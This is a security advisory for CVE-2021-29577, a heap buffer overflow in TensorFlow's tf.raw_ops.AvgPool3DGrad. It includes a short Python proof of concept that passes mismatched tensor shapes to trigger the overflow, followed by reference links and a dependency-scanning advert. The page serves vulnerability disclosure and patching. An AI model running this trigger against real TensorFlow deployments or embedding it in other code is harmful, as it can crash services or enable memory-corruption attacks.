CVE-2021-29577: Heap buffer overflow in `AvgPool3DGrad`
(updated )
The implementation of tf.raw_ops.AvgPool3DGrad is vulnerable to a heap buffer overflow:
import tensorflow as tf
orig_input_shape = tf.constant([10, 6, 3, 7, 7], shape=[5], dtype=tf.int32)
grad = tf.constant([0.01, 0, 0], shape=[3, 1, 1, 1, 1], dtype=tf.float32)
ksize = [1, 1, 1, 1, 1]
strides = [1, 1, 1, 1, 1]
padding = "SAME"
tf.raw_ops.AvgPool3DGrad(
orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides,
padding=padding)
References
- github.com/advisories/GHSA-v6r6-84gr-92rm
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-505.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-703.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-214.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/6fc9141f42f6a72180ecd24021c3e6b36165fe0d
- github.com/tensorflow/tensorflow/security/advisories/GHSA-v6r6-84gr-92rm
- nvd.nist.gov/vuln/detail/CVE-2021-29577
Code Behaviors & Features
Detect and mitigate CVE-2021-29577 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →